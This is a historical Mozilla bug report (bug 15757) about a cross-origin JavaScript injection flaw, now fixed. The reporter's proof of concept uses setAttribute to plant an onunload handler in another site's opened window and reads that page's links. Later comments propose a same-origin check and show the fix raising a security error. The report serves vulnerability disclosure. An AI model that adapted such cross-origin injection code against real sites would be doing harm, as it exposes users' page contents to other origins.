Closed
Bug 15757
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M12
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+])
It is possible to include JavaScript code in any HTML page using setAttribute
and getElementsByTagName.
This exposes the whole DOM of the target document, including content, input
fields, links, etc.
I use the "onunload" body event, but probably there are others ways.
The code is:
--------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
setTimeout("r=a.document.getElementsByTagName('BODY')[0];r.setAttribute('onunloa
d','s=\"Here are some links: \"; for(i=0;i< ( (document.links.length < 10) ?
document.links.length : 10) ;i++) s += document.links[i].href
+String.fromCharCode(10);alert(s)')",10000);
</SCRIPT>
--------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Updated•25 years ago
|
Target Milestone: M12
Assignee | ||
Updated•25 years ago
|
Summary: Injecting JS code using setAttribute and getElementsByTagName → [Dogfood] Injecting JS code using setAttribute and getElementsByTagName
Assignee | ||
Comment 1•25 years ago
|
||
Marking dogfood for analysis by PDT at jar's request.
Assignee | ||
Updated•25 years ago
|
Summary: [Dogfood] Injecting JS code using setAttribute and getElementsByTagName → [DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName
Assignee | ||
Comment 2•25 years ago
|
||
Very ingenious. I think setAttribute should be subject to the same origin policy
check.
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT (1999112908) Com:
Javascript Error: uncaught exception: [Exception... "Security error" code:
"1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location:
"http://www.nat.bg/~joro/mozilla/createel.html Line: 16"]
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•